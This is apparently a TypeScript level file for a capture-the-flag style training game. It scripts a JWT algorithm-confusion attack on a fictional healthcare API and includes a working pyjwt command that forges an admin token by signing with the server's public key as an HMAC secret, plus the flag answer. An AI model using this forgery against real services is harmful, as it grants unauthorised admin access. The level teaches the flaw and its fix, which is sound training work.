import type { ChainDef } from "../../types";
import { match, strictCmd } from "../../engine";

const IP = "192.0.2.100";
const API = `${IP}:8080`;

const LEGIT_TOKEN =
  "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbmFseXN0Iiwicm9sZSI6ImFuYWx5c3QifQ.TZ3F9x8vQnK1Z-R7pL2mYx9cQwerty1234567890abcdef";
const FORGED_PAYLOAD = "eyJzdWIiOiJhbmFseXN0Iiwicm9sZSI6ImFkbWluIn0";
const FORGED_TOKEN = `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.${FORGED_PAYLOAD}.k9Qs3F7vL2mNzXpR8wYt1cVbUhJfEdAqSoIuPlKjHgFdSaMnBvCxZ`;

export const ghostLevel10: ChainDef = {
  id: "ghost-10",
  difficulty: "ghost",
  order: 10,
  points: 300,
  title: "Same Key, Either Way",
  codename: "GHOST ASSESSMENT — SAME KEY, EITHER WAY",
  summary: "The API trusts RS256 tokens signed with a private key you'll never see. It just never said no to HS256 — and HS256 only needs a key it's willing to hand you for free.",
  briefing: [
    `TARGET: Castellan Health Analytics — account API — ${API}`,
    "YOU HAVE: a legitimate, low-privilege API account — analyst : Autumn2025!",
    "",
    "No password to crack, no memory to corrupt. This one's a cryptographic implementation mistake:",
    "the token verification code trusts more than it should about what the token itself claims.",
  ],
  debrief: [
    "root cause: acctapi's JWT verifier called jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\",",
    "\"HS256\"]) (CWE-347, improper verification of cryptographic signature) — pinning the key but not",
    "the algorithm. RS256 and HS256 both take a 'key' argument, but they treat it completely",
    "differently: RS256 uses it as an asymmetric public key to verify a signature made with a",
    "separate private key, while HS256 uses it as raw bytes for a symmetric HMAC secret. Because the",
    "RSA public key was reachable on a file share, it could be fed to an HS256 signer instead — and",
    "the server's own verifier, told 'trust HS256 too,' accepted a signature made with a key it",
    "handed out itself.",
    "",
    "CASTELLAN HEALTH ANALYTICS: SECURED.",
  ],
  nodes: [
    {
      id: "castellan",
      org: "Castellan Health Analytics",
      city: "Castellan",
      state: "PA",
      coords: { x: 80.3, y: 20.9 },
      ip: IP,
      tagline: "Healthcare analytics SaaS platform",
      briefing: [`IP: ${IP}`, `API: ${API}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Locate and retrieve the API's RSA public key", tactic: "Discovery", requires: ["recon"] },
        { id: "obtain-token", label: "Authenticate and capture a legitimate JWT", tactic: "Discovery", requires: ["recon"] },
        { id: "decode-jwt", label: "Decode the JWT and identify its signing algorithm", tactic: "Discovery", requires: ["obtain-token"] },
        {
          id: "leak-config",
          label: "Recover the server's token-verification source and confirm which algorithms it accepts",
          tactic: "Discovery",
          requires: ["identify"],
        },
        {
          id: "forge-token",
          label: "Forge an admin-role token by signing it with the public key as an HMAC secret",
          tactic: "Privilege Escalation",
          requires: ["decode-jwt", "leak-config"],
        },
        { id: "exploit", label: "Use the forged token to reach an admin-only endpoint", tactic: "Defense Evasion", requires: ["forge-token"] },
        { id: "loot", label: "Recover proof of admin access", tactic: "Collection", requires: ["exploit"] },
        { id: "secure", label: "Pin the verification algorithm and rotate the signing key", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "not every crypto bug is broken math — a lot of them are a verifier trusting a field the attacker controls. a JWT's header, including which algorithm signed it, is part of the token itself, sent by whoever's presenting it.",
        "RS256 and HS256 both take a single 'key' value in most JWT libraries, but they use it completely differently — RS256 treats it as an asymmetric public key, HS256 treats the exact same bytes as a shared secret. if a verifier accepts both algorithms and the RS256 public key is something you can just download, you have everything HS256 needs.",
        "pyjwt's jwt.encode(payload, key, algorithm='HS256') will happily sign a token using the downloaded public key file as that secret. once you've confirmed the server's verifier accepts HS256 at all, forge a token with an admin role claim and present it where an authenticated request is expected.",
      ],
      debrief: [],
      commands: [
        strictCmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "80/tcp   open  http    nginx 1.24.0 (internal file share)",
              "8080/tcp open  http    acctapi (JSON API)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.25 seconds",
            ],
          }),
        }),
        strictCmd({
          id: "curl-files",
          tool: "curl",
          requires: ["http://" + IP],
          forbids: ["pubkey.pem", "server.py.bak", ":8080"],
          help: "curl http://<ip>/files/",
          requiresFlags: ["scanned"],
          run: () => ({
            tone: "output",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Internal Build Share</title>",
              '<a href="/files/pubkey.pem">pubkey.pem</a>',
              '<a href="/files/server.py.bak">server.py.bak</a>',
            ],
          }),
        }),
        strictCmd({
          id: "curl-download-key",
          tool: "curl",
          requires: ["http://" + IP, "pubkey.pem"],
          help: "curl -O http://<ip>/files/pubkey.pem",
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["have_pubkey"],
            output: [
              "HTTP/1.1 200 OK",
              "Saving to: 'pubkey.pem'",
              "",
              "-----BEGIN PUBLIC KEY-----",
              "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwT9k2f3n1... (truncated)",
              "-----END PUBLIC KEY-----",
            ],
          }),
        }),
        strictCmd({
          id: "curl-download-cfg",
          tool: "curl",
          requires: ["http://" + IP, "server.py.bak"],
          help: "curl -O http://<ip>/files/server.py.bak",
          requiresFlags: ["scanned"],
          run: () => ({
            tone: "success",
            setsFlags: ["have_config_file"],
            output: ["HTTP/1.1 200 OK", "Saving to: 'server.py.bak'"],
          }),
        }),
        strictCmd({
          id: "cat-config",
          tool: "cat",
          requires: ["server.py.bak"],
          help: "cat server.py.bak",
          requiresFlags: ["have_config_file"],
          run: () => ({
            completesObjective: "leak-config",
            tone: "success",
            setsFlags: ["have_root_cause"],
            note: "Castellan acctapi — verify_token() accepts algorithms=[\"RS256\", \"HS256\"] against the same public key value",
            output: [
              "def verify_token(token):",
              '    return jwt.decode(token, PUBLIC_KEY, algorithms=["RS256", "HS256"])',
              "",
              '[!] the verifier accepts BOTH RS256 and HS256 against the same PUBLIC_KEY value. RS256 uses',
              "    it as an asymmetric public key; HS256 uses the identical bytes as a raw HMAC secret.",
              "    whichever algorithm the token's own header claims decides which check runs.",
            ],
          }),
        }),
        strictCmd({
          id: "login",
          tool: "curl",
          requires: [API + "/login", "analyst", "Autumn2025!"],
          help: `curl -X POST http://${API}/login -d '{"user":"analyst","pass":"Autumn2025!"}'`,
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "obtain-token",
            tone: "success",
            setsFlags: ["have_token"],
            output: ["HTTP/1.1 200 OK", "", `{"token":"${LEGIT_TOKEN}"}`],
          }),
        }),
        strictCmd({
          id: "decode-jwt",
          tool: "python3",
          requires: ["jwt_tool.py", "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9"],
          help: `python3 jwt_tool.py ${LEGIT_TOKEN}`,
          requiresFlags: ["have_token"],
          run: () => ({
            completesObjective: "decode-jwt",
            tone: "success",
            setsFlags: ["saw_jwt_structure"],
            note: "Castellan acctapi — legitimate token: alg RS256, role claim \"analyst\"",
            output: [
              'header:  {"alg":"RS256","typ":"JWT"}',
              'payload: {"sub":"analyst","role":"analyst"}',
              "",
              "[!] the role claim that gates access lives in a token field you can already read — the only",
              "    thing stopping you from just writing role:admin yourself is the signature.",
            ],
          }),
        }),
        strictCmd({
          id: "forge-token",
          tool: "python3",
          requires: ["jwt.encode", "HS256", "admin", "pubkey.pem"],
          help: "python3 -c \"import jwt; key=open('pubkey.pem').read(); print(jwt.encode({'sub':'analyst','role':'admin'}, key, algorithm='HS256'))\"",
          requiresFlags: ["have_pubkey", "have_root_cause", "saw_jwt_structure"],
          run: () => ({
            completesObjective: "forge-token",
            tone: "success",
            setsFlags: ["have_forged_token"],
            note: `Castellan acctapi — forged admin token: ${FORGED_TOKEN}`,
            output: [
              FORGED_TOKEN,
              "",
              "[+] signed with the server's own downloadable public key, used as raw HMAC-SHA256 secret",
              "    bytes instead of an RSA public key — the server never pinned which algorithm it would",
              "    accept, so its own key material forged a token it will trust.",
            ],
          }),
        }),
        strictCmd({
          id: "exploit",
          tool: "curl",
          requires: [API + "/admin/users", "Authorization: Bearer", FORGED_PAYLOAD],
          help: `curl http://${API}/admin/users -H "Authorization: Bearer ${FORGED_TOKEN}"`,
          requiresFlags: ["have_forged_token"],
          deniedOutput: ["you need a forged admin-role token in hand before this endpoint gives you anything but a 401."],
          run: () => ({
            completesObjective: "exploit",
            tone: "success",
            setsFlags: ["admin_access"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"users":[{"id":1,"user":"analyst","role":"analyst"},{"id":2,"user":"svc_billing","role":"admin"}]}',
              "",
              "[+] accepted — the forged HS256 token authenticated as an admin-role user with no real",
              "    admin credential ever touched.",
            ],
          }),
        }),
        strictCmd({
          id: "loot",
          tool: "curl",
          requires: [API + "/admin/flag", "Authorization: Bearer", FORGED_PAYLOAD],
          help: `curl http://${API}/admin/flag -H "Authorization: Bearer ${FORGED_TOKEN}"`,
          requiresFlags: ["admin_access"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Castellan Health Analytics — flag: 1679091c5a880faf6fb5e6087eb1b2dc",
            output: ["HTTP/1.1 200 OK", "", '{"flag":"1679091c5a880faf6fb5e6087eb1b2dc"}'],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm admin access before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] pinned verification to algorithms=[\"RS256\"] only — HS256 is no longer accepted at all",
              "[+] rotated the RSA keypair and removed the old public key from the file share",
              "[+] added algorithm/key-type matching so a symmetric key can never satisfy an asymmetric check",
              "",
              "CASTELLAN HEALTH ANALYTICS: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
